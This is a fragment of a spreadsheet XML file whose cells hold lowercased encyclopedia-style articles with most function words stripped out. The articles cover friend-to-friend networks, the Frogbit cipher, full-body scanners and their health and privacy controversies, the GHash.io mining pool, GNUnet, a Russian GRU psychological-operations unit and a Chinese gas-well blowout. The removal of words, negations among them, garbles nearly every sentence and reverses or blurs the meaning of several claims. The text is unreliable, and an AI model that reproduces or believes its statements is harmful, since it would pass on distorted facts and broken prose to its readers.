references external links free tools analyse texts: frequency analysis tool (with source code) tools analyze arabic text statistical distributions arabic text letters statistical distributions english text statistical distributions czech text character syllable frequencies languages portable tool create frequency syllable distributions english frequency analysis based live data stream posts forum. decrypting text letter frequency german</t>
  </si>
  <si>
    <t>Friend-to-friend</t>
  </si>
  <si>
    <t>friend-to-friend f2f) computer network type peer-to-peer network users make direct connections people know. passwords digital signatures used authentication. unlike kinds private p2p, users friend-to-friend network cannot find else participating beyond circle friends, networks grow size without compromising users' anonymity. retroshare, waste, gnunet, freenet oneswarm examples software used build networks, though retroshare configured friend-to-friend operation default. many networks support indirect anonymous pseudonymous communication users know trust another. example, node friend-to-friend overlay automatically forward file request file) anonymously friends, without telling either other's name address. these friends turn automatically forward file request) friends, bricklin coined term "friend-to-friend network" 2000. potential applications bouillon project uses friend-to-friend network assign trust ratings messages. also darknet messenger private trust references b.c. popescu, crispo, a.s. tanenbaum. "safe private data sharing turtle: friends team-up beat system." 12th international workshop security protocols, cambridge, april 2004. chothia chatzikokolakis. survey anonymous peer-to-peer file-sharing." proceedings ifip international symposium network-centric ubiquitous systems (ncus 2005), nagasaki, japan, volume 3823 lecture notes computer science, pages 744–755. springer, 2005. dabek. "f2f: reliable storage open networks." international workshop peer-to-peer systems (iptps '06), santa barbara, usa, february 2006. rogers bhatti. "how disappear completely: survey private peer-to-peer networks." international workshop sustaining privacy collaborative environments (space 2007), moncton, canada, july 2007. numbered references: external links friend2friend.net, scripting language writing software discussion archived 2006-09-24 wayback machine involving clarke freenet page altruists.org bouillon project website wayback machine (archived july 2010)</t>
  </si>
  <si>
    <t>Frogbit (cipher)</t>
  </si>
  <si>
    <t>cryptography, frogbit stream cypher algorithm developed thierry moreau patented. includes message authentication code feature. submitted estream project ecrypt network. selected focus algorithm phase 'archived'.</t>
  </si>
  <si>
    <t>Full body scanner</t>
  </si>
  <si>
    <t>full-body scanner device detects objects inside person's body security screening purposes, without physically removing clothes making physical contact. unlike metal detectors, full-body scanners detect non-metal objects, became increasing concern various airliner bombing attempts 2000s scanners also detect swallowed items hidden body cavities person. starting 2007, full-body scanners started supplementing metal detectors airports train stations many countries. three distinct technologies used practice: millimeter wave scanners non-ionizing electromagnetic radiation similar used wireless data transmitters, extremely high frequency (ehf) radio band (which lower frequency visible light). health risks posed machines still studied, evidence mixed, though millimeter wave scanners generate ionizing radiation. x-ray-based scanners backscatter x-ray scanners dose radiation detecting suspicious metallic non-metallic objects hidden clothing shoes cavities human body. dosage radiation received usually 0.05 considerable debate regarding safety method sparked investigations, ultimately leading multiple countries usage them. transmission x-ray scanners higher dosage penetrating radiation passes human body captured detector array detectors. this type full body scanners allows detect objects hidden clothes, also inside human body (for example, drugs carried drug couriers stomach) natural cavities. dosage received usually higher 0.25 mainly regulated american radiation safety standard personal search systems using gamma x-ray radiation infra-red thermal conductivity scanners electromagnetic radiation penetrate body clothing, instead slight temperature differences surface clothing detect presence foreign objects. thermal conductivity relies ability contraband hidden clothing heat cool surface clothing faster skin surface. warm used heat surface clothing. fast clothing cools dependent, part, beneath items cool clothing faster slower surface skin identified thermal image clothing. these scanners less often used compared x-ray-based mmwave-based scanners.passengers advocates objected images naked bodies displayed screening agents recorded government. critics called imaging virtual strip searches without probable cause, suggested illegal violate basic human rights. however, current technology less intrusive privacy issues people allowed refuse scan traditional pat-down. depending technology used, operator alternate-wavelength image person's naked body, merely cartoon-like representation person indicator showing suspicious items detected, full x-ray image person. privacy security reasons, display generally visible passengers, cases located separate room operator cannot face person screened. transmission x-ray scanners claim privacy neutral almost distinguish person also software able hide privacy issues. history first (ultra-low-dose backscatter x-ray) full body security scanner developed steven smith, developed secure 1000 whole body scanner 1992. subsequently sold device associated patents rapiscan systems, manufacture distribute device. safety aspects secure 1000 assessed food drug administration, national council radiation protection measurements independent sources since early 1990s.in 2000 vladimir linev within adani patented system scanning person, based transmission (penetrating) x-ray technology, focused search unwanted objects contraband base conpass body scanner marketed later. first millimeter-wave full body scanner developed pacific northwest national laboratory (pnnl) richland, washington. operation four national laboratories battelle manages u.s. department energy. 1990's, patented holographic-imagery technology, research development support provided federal aviation administration (faa). 2002, silicon valley startup safeview, inc. obtained exclusive license pnnl's (background) intellectual property, commercialize technology. from 2002 2006, safeview developed production-ready millimeter body scanner system, software included scanner control, algorithms threat detection object recognition, well techniques conceal images order resolve privacy concerns. during time, safeview developed foreground several patent applications. 2006, safeview's body scanning portals installed trialed various locations around globe. they installed border crossings israel, international airports mexico city amsterdam's schiphol, ferry landings singapore, railway stations government buildings like hague, commercial buildings tokyo. they also employed secure soldiers workers iraq's green zone. 2006, safeview acquired communications. from 2006 2020, communications (later l3harris) continued make incemental enhancements scanner systems, deploying thousands units world wide. 2020, leidos acquired l3harris, included body scanner business unit.the first passive, non-radiating full body screening camera device developed lockheed martin sponsorship national institute justice (nij)'s office science technology united states force research laboratory. proof concept conducted 1995 defense advanced research projects agency (darpa). rights technology subsequently acquired brijot imaging systems, matured commercial-grade product line manufacture, market support passive millimeter wave camera devices. usage schiphol netherlands first airport world implement safeview's millimeter-wave body scanner large scale test flight personnel previous year. 2007, purchased security scans installed. italian government planned install full-body scanners airport train stations throughout country, announced september 2010 plans remove scanners airports, calling "slow ineffective."the european union currently allows member states decide whether implement full body scanners countries: member state decide authorise scanners national airports. that change scanning technology used covered eu-wide standards detection capability well common safeguards ensure compliance health fundamental rights provisions. australia australia government decided opt-out policy enforced relation screening airports. persons medical physical conditions prevent undertaking body scan offered alternative screening methods suitable circumstances. infants young children selected undergo body scan. body-scanners used eight australia's international airports adelaide, brisbane, cairns, darwin, gold coast, melbourne, perth sydney. passengers exiting international flights affected. domestic international passengers departing newcastle port stephens airport subject body scanning since october 2019. passengers refuse scan banned flying. scanners proposed used australia shown high rate error testing. public outrage nude images created body scanners collected policy resulted lawsuit 2010 stop body scanning. canada canada, airports currently scanners use, using millimeter-wave technology. transport canada notes "passengers selected secondary search choose full body scanner physical search." united states u.s. full-body scanners installed train stations, subways, penitentiaries airports.after previously used x-ray-based scanners currently uses millimeter wave scanners exclusively, show identifying characteristics person scanned. instead, generic outline person used. december 2015, "while passengers generally decline screening favor physical screening, direct mandatory screening passengers warranted security considerations order safeguard transportation security."regarding privacy concerns transportation security administration (tsa) stated 2010 "[have] not, machines cannot store images passengers airports". however later disclosed, response house chair homeland security, procurement airport scanners requires manufacturers include image storage transmission features features disabled placed airport. shows individuals ability turn machines 'test mode' enables recording images, states would never production system. marshal service operate backscatter machine courthouse records images. however, statement noted individuals involved test recorded. sample images received disseminated gizmodo 2010, using freedom information request. clear marshal service scanning machines, recording capabilities, production. analyst different room supposed able person scanned backscatter x-ray ait, contact officials halt scanned person anything suspicious shows scan. penitentiary also constantly purchasing x-ray full body scanners contraband weapons detection purposes. scanners generally transmission x-ray scanners since devices capable detecting metallic non-metallic contraband hidden underneath clothing well contraband hidden inside body cavities. united kingdom civil rights groups britain 2010 argued body scanning children contravened relating child pornography.passive infra-red scanners developed public spaces collect analyse natural heat radiation given human body detect metallic non-metallic "threat objects". external radiation source used privacy preserved body details revealed. police conducting trial equipment london rail stations. asia pacific during forecast period 2020–2025, asia–pacific region projected grow highest market cagr (compound annual growth rate). growth region possibly high airport investments improvements prison systems. china india heavily investing greenfield airport construction. january 2020, indian government decided equip airports full-body scanners, indian market grow higher rate. controversies privacy some argue using full-body scanner equivalent strip search, used without probable cause violates basic human rights.full-body scanning allows screeners surface skin clothing, prosthetics including breast prostheses prosthetic testicles, require potentially embarrassing, physical inspection detected. scanners also detect medical equipment normally hidden, colostomy bags catheters. transgender community also privacy concerns body scanners could lead harassment. 2010, equality human rights commission argued full-body scanners risk human rights might breaking law.a ruling european council 2013 required persons analyzing image shall separate location image shall linked screened person.in 2010 national human rights commission korea opposed full-body scanners recommended deployed airports.opponents argue full body scanners patdowns unconstitutional. comprehensive student note came fall 2010 issue university denver transportation journal arguing full-body scanners unconstitutional united states invasive effective enough process inefficient.on july 2010, electronic privacy information center (epic) filed lawsuit suspend deployment full-body scanners airports united states: epic argued federal agency violated administrative procedures act, privacy act, religious freedom restoration act, fourth amendment. epic cited invasive nature devices, tsa's disregard public opinion, impact religious freedom. epic claimed time full-body scanners violated fourth amendment united states constitution subject citizens virtual strip search without evidence wrongdoing.the american civil liberties union, 2006, called machines invasion privacy: "this concern genitals body size, body shape things like evidence mastectomies, colostomy appliances catheter tubes. these personal things people every right keep private personal, aside modesty consideration wanting naked."in idaho bill introduced 2011 prevent full-body scanners primary screening method allow people request alternative.travelers u.s. airports complained opted scanned, subjected type invasive pat-down traveler 2010 described "probing pushing genital area." another traveler united states complained 2010 employee "inserted four fingers hands inside trousers fingers around waist, fingers extending least inches waistline."as december 2015 published policy required "mandatory" "some" passengers "security reasons". however, individuals still scanner choose pat-down uncomfortable going scanner. individuals also right patted private room witnessed person individual's choice.in november 2010, female traveler opted full body scan fort lauderdale international airport claimed agents handcuffed chair ripped plane ticket asked questions type invasive receive. response, posted parts security camera footage blog, though sound video passenger directly camera incident. wholebody imaging technology used sole primary method screening persons, used screen person unless another method screening, metal detection, demonstrates cause preventing person boarding aircraft entering public facility government building. united states, 2010 required full-body scanners "allow exporting image data real time", cases government's storing images confirmed.in august 2010, reported united states marshals service saved thousands images millimeter wave scanner. part department homeland security reiterated scanners save images scanners capability save images installed airports. however, statements contradict tsa's procurement specs specifically require machines ability record transmit images, even features might initially turned delivery. opponents also expressed skepticism successful terror attack machines could save images later inspection find went wrong scans. november 2010, stored 35,000 body scan images leaked online posted gizmodo.in february 2012 airport employees lagos allegedly discovered wandering away cubicle located hidden corner right side screening area full-body scanner monitors located. dallas worth international airport, complaints reported disproportionally stem women felt singled repeated screening entertainment male security officers. treatment minorities current backscatter millimeter wave scanners installed unable screen adequately security threats inside turbans, hijab, burqas, casts, prosthetics loose clothing. this technology limitation current scanners often requires persons undergo additional screening hand methods cause additional delay feelings harassment.according manufacturer machines, next generation backscatter scanners able screen types clothing. these improved scanners designed equalize screening process religious minorities.currently transmission (penetrating) x-ray technology detect hidden objects inside prosthetic devices hiding criteria type. treatment transgender people current machines installed require agents designate passenger either male female, software compares passenger's body normative body sex. transgender passengers reported full body scanners several u.s. airports falsely raised alarms based anatomy. health concerns health concerns relating full-body scanning technology present, especially pertaining x-ray scanners. issue mainly regulated ansi 43.17.2009, limits dose per-person basis. however 2010-era document intended apply primarily context standard civilian-airport security. generally considered applicable unusual terrorism-threat detection concerns high-security environments (prisons, special-purpose airports) military institutions. ansi 43.17.2009 considered appropriate standard highly concealed threats liquid bombs inside body cavities swallowed drugs. fundamental physical limitations type detection technology functions, highly covert types threats impossible detect means transmission x-rays. from perspective annual dosage, ansi 43.17.2009 standard stipulates transmission x-ray dosage 0.25 scan, conjunction annual total limit µsv, equates per-person maximum 1000 scans year civilian-aviation passenger. however, counting medical x-ray procedures typical person might undergo average year), total annual dose taken include medical-related doses, number flights/scans permitted person could greatly reduced, assuming transmission-type x-ray technology used security screening civil-aviation passenger undergoes. medical x-ray dosages vary tremendously (over several orders magnitude) depending diagnostic procedures patient subjected proportional contribution airport-security x-raying person's total annual dosage cannot calculated unless accounting medical x-ray dosages also present. millimeter wave scanners currently adopted millimeter wave scanners operate millimeter sub-terahertz band, using non-ionizing radiation, proven adverse health effects, though long-term studies done. thomas tenforde, president national council radiation protection measurements, said 2010 millimeter wave scanners probably within bounds standards safe operation], effort verify safe frequent use. (world health organization) 2011 categorized (radio frequency) radiation possible carcinogen.numerical simulations terahertz radiation, active millimeter-wave scanners operate produced mixed results. researchers center nonlinear studies alamos national laboratory mexico used simulations show terahertz radiation affect dna, however, verified. backscatter x-ray scanners united states, modernization reform 2012 required full-body scanners operated airports transportation security administration "automated target recognition" software, replaces picture nude body cartoon-like representation. result law, backscatter x-ray machines formerly transportation security administration removed airports 2013, since agency said vendor (rapiscan) meet contractual deadline implement software.in european union, backscatter x-ray screening airline passengers banned 2012 protect passenger safety, deployment manchester airport removed. several radiation safety authorities including national council radiation protection measurements, health physics society, american college radiology, stated "not aware evidence" full-body scans unsafe. however, radiation authorities, including international atomic energy agency nuclear energy agency recommend using ionizing radiation certain populations like pregnant women children, opponents devices long-term studies done health effects either backscatter x-ray millimeter wave scanners: think right questions asked. enough information make decision whether there's going biological effect not". (douglas boreham, professor medical physics applied radiation sciences mcmaster university hamilton, ontario.) richard morin, medical physicist mayo clinic said concerned health effects backscatter x-ray scanners: "from radiation standpoint evidence really untoward effect device [backscatter scanner], would concerned radiation dose standpoint issues personal privacy different thing". health effects common millimeter wave scanner largely unknown, least expert believes safety study warranted. interested performing national council radiation protection measurements study millimeter-wave security screening systems", said thomas tenforde, council president. however, long-term studies done health effects millimeter wave scanners. perhaps notable debated professional opinion regard safety scanners so-called "holdren letter" number world-renowned biochemists biophysics researchers university california assistant president science technology, john holdren (co-author ecosolutions). opening paragraph letter concern reads: "we, number university california, francisco faculty, writing—see attached memo—to call attention concerns potential serious health risks recently adopted whole body back scatter x-ray airport security scanners. this urgent situation x-ray scanners rapidly implemented primary screening step travel passengers."critics backscatter x-ray scanners, including head center radiological research columbia university, radiation emitted full-body scanners much times stronger officially reported safe large numbers persons increased risk cancer children at-risk populations. researchers university california, francisco, (ucsf) argued amount radiation higher claimed body scanner manufacturers doses calculated distributed throughout whole body, radiation backscatter x-ray scanners focused skin surrounding tissues: majority [the scanners'] energy delivered skin underlying tissue. thus, dose would safe distributed throughout volume entire body, dose skin dangerously high. x-ray dose devices often compared media cosmic exposure inherent airplane travel chest x-ray. however, comparison misleading: travel cosmic exposure chest rays much higher x-ray energies health consequences appropriately understood terms whole body volume dose. contrast, airport scanners largely depositing energy skin immediately adjacent tissue, since small fraction body weight/vol, possibly orders magnitude, real dose skin high. addition, appears real independent safety data exist. search, ultimately finding radiation physics staff, suggests relevant radiation quantity, flux [photons unit area time (because scanning device)] characterized. instead indirect test (air kerma) made emphasized whole body exposure value, thus appears danger compared cosmic rays airplane travel chest x-ray dose. however professors ucsf radiology department disagree, saying radiation dose low. "the conclusions wrong", ronald arenson, professor radiology, tells weekly institution's letter. "people totally unrelated radiation wrote senior faculty ucsf. they're smart people well-intended, conclusions, think, off-base. they understand radiation translates actual dose human body". steve smith, inventor body scanner 1991, president tek84, companies produces machines, stated concerns brenner ucsf scientists regarding skin dose backscatter scanners incorrect. states values used x-ray penetration incorrectly based description imaging depth describes instrument sees skin dosage depth deeper. describes experimental proof x-rays properties x-rays penetration correct averaged whole body. smith provided measured data operating body scanner explain position.in october 2010, responded concerns ucsf researchers white house science advisor.scanners also concentrate dose time, deliver high dose-rate moment exposure. high dose-rate exposure shown cause greater damage radiation dose delivered lower rates. this raises questions comparisons background radiation. report states: since general-use x-ray systems emit ionizing radiation, societal benefit reliably detecting threats must sufficient outweigh potential radiation risk, any, individual screened. dose screening general-use x-ray security screening system presents extremely small risk individual. radiation dose received perspective: naturally occurring ionizing radiation around continuously exposed background radiation ordinary living. minutes ordinary living, person receives radiation naturally occurring sources screening general-use x-ray security system. national radiation safety standard (see below) sets dose screening limit general-use category. meet requirements general-use category full-body x-ray security system must deliver less dose person receives minutes airline flight. dose limit ensure person receives less radiation scan general-use x-ray security system minutes airline flight. person would screened thousand times year order exceed annual radiation dose limit people screening expert radiation safety organizations (see below). millimeter wave security systems comply limits applicable national non-ionizing radiation safety standard (see below) cause known adverse health effects. u.s. also made public various independent safety assessments secure 1000 backscatter x-ray scanner.dr. david brenner, head columbia university's center radiological research, said although danger posed individual passenger "very low", urging researchers carry tests device look affects specific groups could sensitive radiation. andrew einstein, director cardiac research columbia university, made following statements support safety body scanners: passenger would need scanned using backscatter scanner, front back, 200,000 times receive amount radiation equal typical scan another look scanned backscatter scanner every life, would still receive tenth dose typical scan comparison, amount radiation backscatter scanner equivalent minutes natural background radiation united states believe general public nothing worry terms radiation airline scanning moms-to-be, evidence supports increased risk miscarriage fetal abnormalities scanners pregnant woman receive much radiation cosmic rays exposed flying passing scanner airport". 2010 national council radiation protection measurements issued press release response health risk claims ucsf columbia university (claims excessive skin dose risks large populations individuals). ncrp claims cancer risks cited opponents completely inaccurate, stating that: summation trivial average risks large populations time periods single value produces distorted image risk, completely perspective risks accepted every day, voluntarily involuntarily. general-use systems adhere effective dose microsievert (μsv) (0.01 millirem) less scan, used mostly without regard number individuals scanned number scans individual year. effective dose (0.01 mrem) scan would allow 2,500 scans individual annually [i.e., scan required (0.01 mrem)] without exceeding administrative control 0.25 mrem) member general public single source sources control. assuming workdays year, would correspond average scans day, frequency unlikely encountered. inter-agency committee radiation safety includes international atomic energy agency, nuclear energy agency world health organization, reported that, "pregnant women children subject scanning, even though radiation dose body scanners 'extremely small'".it also suggested defects machines, damage normal wear-and-tear, software errors could focus intense dose radiation spot body. researchers write: moreover, number 'red flags' related hardware itself. because device scan human seconds, x-ray beam intense. glitch power point hardware importantly software) stops device could cause intense radiation dose single spot skin. oversee problems overall dose repair software problems? already complaining resolution limitations; keep manufacturers and/or raising dose, easy improve signal-to-noise higher resolution? lastly, given recent incident december 25th), know whether manufacturer tsa, seeking higher resolution, scan groin area slowly leading much higher total dose? proponents backscatter x-ray scanners argue ansi n43.17 standard addresses safety requirements engineering design systems prevent occurrence accidental high radiation defects errors hardware software. safety requirements include "fail-safe" controls, multiple overlapping interlocks engineering design ensure failure systems result safe non-operation system reduce chance accidental exposures. furthermore, requires certification ansi n43.17 standard performed third party manufacturer themselves. cases types medical scanning machines, operated trained medical personnel, malfunctioned, causing serious injury patients scanned. critics full-body scanners cite incidents examples radiation-based scanning machines overdose people radiation despite safety precautions.in march 2011, found full body scanners emitting times normal level radiation: contractors charged routinely examining scanners submitted reports containing discrepancies, including mathematical miscalculations showing devices emitted radiation levels times higher normal:peter kant, executive vice president rapiscan systems, said review surveys found instances technician incorrectly math came results showed radiation readings factor 10". x-rays backscatter scanners "are form ionizing radiation, radiation powerful enough strip molecules body electrons, creating charged particles cause cell damage thought mechanism radiation causes cancer." humans exposed background radiation every day, anywhere earth, proponents backscatter x-ray scanners devices expose subjects levels radiation equivalent background radiation. furthermore, traveling airplane, passengers exposed much higher levels radiation earth altitude. proponents backscatter x-ray scan equivalent radiation received minutes flying.the health protection agency also issued statement radiation dose backscatter scanners "about hour background radiation".the european commission issued report stating backscatter x-ray scanners pose known health risk, suggested backscatter x-ray scanners, expose people ionizing radiation, used millimeter-wave scanners "have less effects human body" available.assuming conditions equal, reason adopt x‐ray backscatters, expose subject additional although negligible source ionizing radiations. other (whole body imaging) technologies preferred standard use. however, european commission's report provides data substantiating claim "all conditions equal". area backscatter x-ray scanners provide better performance millimeter wave scanners, example, inspection shoes, groin armpit regions body. european commission also recommended alternate screening methods "used pregnant women, babies, children people disabilities".in united states, senator susan collins, ranking member senate homeland security committee sent letter august 2010, secretary homeland security administrator tsa, requesting "have department's chief medical officer, working independent experts, conduct review health effects travelers, employees, airport airline personnel." completed review.the u.s. government also supplying higher-radiation through-body x-ray machines least african countries "for purposes airport security kind flesh, deliver real doses radiation. u.s.-supplied scanners apparently deployed airport ghana four nigeria". this caused question u.s. government intends technology.unions airline pilots working american airlines airways urged pilots avoid full body scanners. child scanning there controversy full-body scanners countries machines create images virtual strip searches persons violate child pornography laws. scanners breaking protection children 1978 creating images pseudo-images nude children.parents complained young children virtually strip searched, sometimes without parents present. ineffectiveness backscatter millimeter some critics suggest full-body scanner technology ineffective multiple reasons, including easily bypassed study published november 2010 edition journal transportation security suggested terrorists might fool rapiscan machines others like employing x-ray "backscatter" technique. terrorist, report found, could tape thin film explosives 15–20 centimeters diameter stomach walk machine undetected.terrorists already evolved tactics surgically implanted bombs bombs hidden body cavities.in march 2012, scientist blogger jonathan corbett demonstrated ineffectiveness machines publishing viral video showing able metal backscatter x-ray millimeter wave scanners airports. april 2012, corbett released second video interviewing screener, described firearms simulated explosives passing scanners internal testing training. another test full-body scanners, machines failed detect bomb parts hidden around person's body. different test 2011, undercover agent able carry handgun full body scanners multiple times without weapon detected. however, case, agent charge viewing scanned images simply paying attention.furthermore, israeli airport security expert, rafi sela, helped design security gurion international airport, said: know everybody running expensive useless machines. overcome body scanners enough explosives bring boeing 747... that's airport."again, despite scanners, unable stop weapons like cutters pistols carried onto airplanes.the australia government challenged effectiveness cost full body scanners public media australian transport minister anthony albanese said "makes apologies" mandating installation full body scanners australian airports.two alternatives argued experts, prof chris mayhew birmingham university, chemical-based scanners bomb-sniffing dogs. others argued passenger profiling, done israeli airport security, replace full body scanners patdowns. transmission (penetrating) unlike above, transmission technology allows detect objects swallowed hidden inside objects. this main reason commonly used prisons jails. however current technology allow dual-energy body scanning (and detecting object atomic number like used baggage vehicle x-ray scanners) could give image detection effectiveness regular black white x-ray. this leads idea human-held detection (finding threats looking image finding non-common human body items) effective find contraband. however counting human factor (fatigue, decreased attention) threats still could missed. modern software based artificial intelligence full body scanners designed minimize human faults rise detection effectiveness method. public opinion gallup poll given 2009 christmas bombing attempt suggested american airline travelers approved body scanners disapproved. indicated would level discomfort full-body scans, said would uncomfortable idea. poll given context 2009 christmas bombing attempt, opponents full body scanners explosives used bombing attempt would detected full-body scanners.an abc/washington post poll conducted langer associates released novem</t>
  </si>
  <si>
    <t>GHash.io</t>
  </si>
  <si>
    <t>ghash.io bitcoin mining pool operated 2013-2016. pool gained notoriety briefly controlling bitcoin's computing power 2014 (notable bitcoin supposedly outside party's control). history ghash.io founded owned cex.io, cryptocurrency exchange continues operate today. apart mining bitcoin, ghash.io hosted multipool mining altcoins, well separate pools mining litecoin, dogecoin, auroracoin, darkcoin. altcoin mining options available independent miners, bitcoin mining could also done cloud purchasing cloud-based mining power cex.io. traders cex.io could shares ghash.io mining hardware operate ghash.io mining pool. after ghash.io closed 2016, cex.io continued operating bitcoin exchange. attack controversy popularity ghash.io's mining pool, many people bitcoin community worried possibility attack. this kind attack occurs single miner mining pool able mine multiple bitcoin block rewards row. this would problem bitcoin network, hypothetically allows mining pool double-spend (counterfeit) bitcoins. july 2014, ghash.io mining pool briefly exceeded threshold, forced bitcoin community discuss possibility finding common solution threat. pool developing majority caused prominent bitcoin developer peter todd sell half holdings. news reportedly caused bitcoin's price drop $633 $600 time.since long-term solution problem known, participants agreed implement temporary measures. ghash.io released voluntary statement promising would exceed overall bitcoin hashrate. moreover, ghash.io representatives asked mining pools follow example sake entire bitcoin community. also stated committee created watchdog problem. this committee would include representatives mining pools, bitcoin businesses specialists field. discussion received broad coverage media, beyond publications commonly focus cryptocurrency news: arstechnica, bloomberg view, vice motherboard, international business times.as 2015, ghash.io's pool fallen less total hashrate. references external links official website</t>
  </si>
  <si>
    <t>GNUnet</t>
  </si>
  <si>
    <t>gnunet software framework decentralized, peer-to-peer networking official package. framework offers link encryption, peer discovery, resource allocation, communication many transports (such tcp, udp, http, https, wlan bluetooth) various basic peer-to-peer algorithms routing, multicast network size estimation.gnunet's basic network topology mesh network. gnunet includes distributed hash table (dht) randomized variant kademlia still efficiently route small-world networks. gnunet offers "f2f topology" option restricting connections users' trusted friends. users' friends' friends (and indirectly exchange files users' computer, never using address directly. gnunet uses uniform resource identifiers (not approved iana, although application made). gnunet uris consist major parts: module module specific identifier. gnunet form gnunet://module/identifier module module name identifier module specific string. primary codebase written bindings languages produce developing extensions languages. gnunet part project. gained interest hacker community prism revelations.gnunet consists several subsystems, essential ones transport core subsystems. transport subsystem provides insecure link-layer communications, core provides peer discovery encryption. core subsystem various applications built. gnunet includes various applications main distribution framework, including filesharing, chat vpn; additionally, external projects (such secushare) also extending gnunet infrastructure. gnunet unrelated older gnutella protocol. gnutella official project, gnunet transport originally, gnunet used underlying transport. gnunet transport subsystem provides multiple options, smtp.the communication port, officially registered iana, 2086 (tcp udp). trust system gnunet provides trust system based excess-based economic model. idea employing economic system taken mojonation network.gnunet network trusted entities impossible maintain global reputation. instead, peer maintains trust local links. when resources, bandwidth time, excess, peer provides requesting neighbors without reducing trust otherwise charging them. when node stress drops requests neighbor nodes lower internal trust value. however, peer less resources enough fulfill everyone's requests, denies requests neighbors trusts less charges others reducing trust. file sharing primary application point anonymous, censorship-resistant file-sharing, allowing users anonymously publish retrieve information kinds. gnunet protocol provides anonymity called (gnunet anonymity protocol). gnunet additionally make libextractor automatically annotate shared files metadata. file encoding files shared gnunet ecrs encoding censorship-resistant sharing) coded.all content represented gblocks. each gblock contains 1024 bytes. there several types gblocks, serves particular purpose. gblock {\displaystyle uniquely identified ripemd-160 hash {\displaystyle h(b)} dblocks store actual file contents nothing else. file split 1024 byte boundaries resulting chunks stored dblocks. dblocks linked together merkle tree means iblocks store dblock identifiers. blocks encrypted symmetric derived {\displaystyle h(b)} stored network. queries replies gnunet anonymity protocol consists queries replies. depending load forwarding node, messages forwarded zero nodes. queries used search content request data blocks. query contains resource identifier, reply address, priority (time-to-live). resource identifier datum {\displaystyle triple-hash {\displaystyle h(h(h(q)))} peer replies query provides {\displaystyle h(h(q))} prove indeed requested resource without providing {\displaystyle h(q)} intermediate nodes, intermediate nodes can't decrypt {\displaystyle reply address major difference compared freenet protocol. while freenet reply always propagates back using path query, gnunet path shorter. peer receiving query drop forward without rewriting reply address indirect replacing reply address address. indirecting queries peer provides cover traffic queries, forwarding peer avoids link reply propagation preserves bandwidth. this feature allows user trade anonymity efficiency. user specify anonymity level publish, search download operation. anonymity level zero used select non-anonymous file-sharing. gnunet's infrastructure used non-anonymous file-sharing specified. anonymity level determines much cover traffic peer must hide user's actions. priority specifies much trust user wants spend case resource shortage. used prevent queries staying network long. file sharing uris module identifier consists either chk, sks, followed slash category specific value. most uris contain hashes, encoded base32hex. identifies files, typically: gnunet://fs/chk/[file hash].[query hash].[file size bytes]file hash hash plaintext file, allows decrypting downloaded. query hash hash topmost gblock allows downloading whole tree gblocks contain encrypted file. file size required determine shape tree.sks identifies files within namespaces, typically: gnunet://fs/sks/namespace/identifier identifies search queries, typically: gnunet://fs/ksk/keyword[+keyword]* identifies datum specific machine, typically: gnunet://fs/loc/peer/query.type.key.size examples type gnunet filesharing pointing specific copy license text: gnunet://fs/chk/9e4mdn4vule8kjg6u1c8fkh5ha8c5chsjtilrttpgk8mj6vhorerhe68ju8q0fdtoh1dgluj3nle99n0ml0n9pibagkg7mnpbtt6ukg.1i823c58o3lks24lli9kb384lh82lgf9guqrjhaccuinscqh36si4nf88cmaet3t3bhi93d4s0m5cc6mvdl1k8gfkvbn69q6t307u6o.17992 another type gnunet filesharing uri, pointing search results search keyword "gpl": gnunet://fs/ksk/gpl name system gnunet includes implementation name system (gns), decentralized censorship-resistant replacement dns. gns, user manages zones delegate subdomains zones managed users. lookups records defined users performed using gnunet's dht. protocol translation gnunet tunnel traffic peer-to-peer network. necessary, gnunet perform ipv4-ipv6 protocol translation process. gnunet provides application-level gateway proxy requests addresses desired address family necessary. this way, gnunet offers possible technology facilitate ipv6 transition. furthermore, combination gns, gnunet's protocol translation system used access hidden services ip-based services locally peer network accessed resolving name. social gabor toth published early september 2013 thesis present design social messaging service gnunet peer-to-peer framework offers scalability, extensibility, end-to-end encrypted communication. scalability property achieved multicast message delivery, extensibility made possible using psyc (protocol synchronous conferencing), provides extensible (remote procedure call) syntax evolve time without upgrade software nodes network. another feature provided psyc layer stateful multicast channels, used store e.g. user profiles. end-to-end encrypted communication provided mesh service gnunet, upon multicast channels built. pseudonymous users social places system cryptographical identities identified public mapped human memorable names using (gnu name system), pseudonym zone pointing places. that required building block turning gnunet framework fully peer-to-peer social networking platform. chat chat implemented cadet module, interface gnome exists, specifically designed emerging linux phones (such librem pinephone). also interplanetary file system comparison file-sharing applications synchronous conferencing notes references further references external links official website</t>
  </si>
  <si>
    <t>GRU Unit 54777</t>
  </si>
  <si>
    <t>unit 54777 (also known 72nd special service center) russian unit reportedly responsible psychological operations. unit 54777 retains several front organizations, including inforos institute russian diaspora. unit originated soviet glavpur (glavnoye politicheskoye upravlenie, main political department) created early 1990s notably employed colonel aleksandr viktorovich golyev, whose memoirs published 2020 along documents. 1990s, unit focused pro-soviet disinformation newly split republics lithuania chechnya. later years unit covered broad range activities running ngos targeting russian expatriates western countries (inforos, institute russian diaspora, world coordinating council russian compatriots living abroad, foundation supporting protecting rights compatriots living abroad) manipulating public opinion russia abroad preparation armed conflicts georgia, donbas syria.according report meduza, alexander starunsky (russian: александр старунский), deputy commander unit accused spreading disinformation coronavirus appointed security council russia (sovbez) 2021. references</t>
  </si>
  <si>
    <t>Gaoqiao, Kai County</t>
  </si>
  <si>
    <t>gaoqiao (simplified chinese: 高桥镇; traditional chinese: 高橋鎮; pinyin: gāoqiáo zhèn) town located valley county, northeast chongqing municipality southwest china. central chongqing lies kilometres (210 southwest. december 2003 21:15, well burst released highly toxic hydrogen sulfide. according china daily, people died least 9,000 injured. well called “罗家16h” belonged petrochina's southwest field branch (西南油气田分公司). located chuandongbei field (chinese: 川东北气矿; pinyin: chuāndōngběi qìkuàng) gaoqiao's xiaoyang village (chinese: 小阳村; pinyin: xiǎoyáng cūn).in 2007, chevron corporation china national petroleum corporation signed contract share production chuandongbei, chevron getting percent venture, operating project supplying technology. references external links well blowout kills least article china daily, dated 2003-12-25 china tries plug burst natural well article msnbc, dated 2003-12-2531°22′01″n 108°14′42″e</t>
  </si>
  <si>
    <t>Garbage in, garbage out</t>
  </si>
  <si>
